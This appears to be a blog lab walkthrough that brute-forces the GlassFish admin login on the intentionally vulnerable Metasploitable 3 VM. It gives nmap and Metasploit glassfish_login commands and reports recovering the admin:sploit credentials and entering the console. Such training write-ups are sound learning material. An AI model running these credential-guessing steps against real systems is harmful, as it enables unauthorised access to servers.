Exploitation of Metasploitable 3 using Glassfish Service

Target: Metasploitable 3
Attacker: Kali Linux

Use nmap command for scanning the target PC. NMAP will show all available open ports and their running services. Type the following command on terminal in kali Linux for aggressive scan.

nmap -p- -A

Open target IP on browser with one of unknown port 4848 as

Start metasploit framework by typing msfconsole on terminal in kali Linux when metasploit get loaded type given below command for attack.

This module attempts to login to GlassFish instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also try to do an authentication bypass against older versions of GlassFish. Note: by default, GlassFish 4.0 requires HTTPS, which means you must set the SSL option to true, and SSLVersion to TLS1. It also needs Secure Admin to access the DAS remotely.

msf > use auxiliary/scanner/http/glassfish_login
msf auxiliary(glassfish_login) > set rhosts
msf auxiliary(glassfish_login) > set rport 4848
msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true
msf auxiliary(glassfish_login) > set  user_file /root/Desktop/user.txt
msf auxiliary(glassfish_login) > set  pass_file /root/Desktop/pass.txt
msf auxiliary(glassfish_login) >exploit

After few attempt successfully we have our login for GLASSFISH as admin: sploit

Let use this credential which we have got from metasploit and try to open target IP in browser as I am using:  

This URL gets open for administration console here it is asking for user and password login, now try to use admin: sploit as username and password respectively.

Through these credential we have breach admin console and got glassfish console and this page consist several common task.


Post a Comment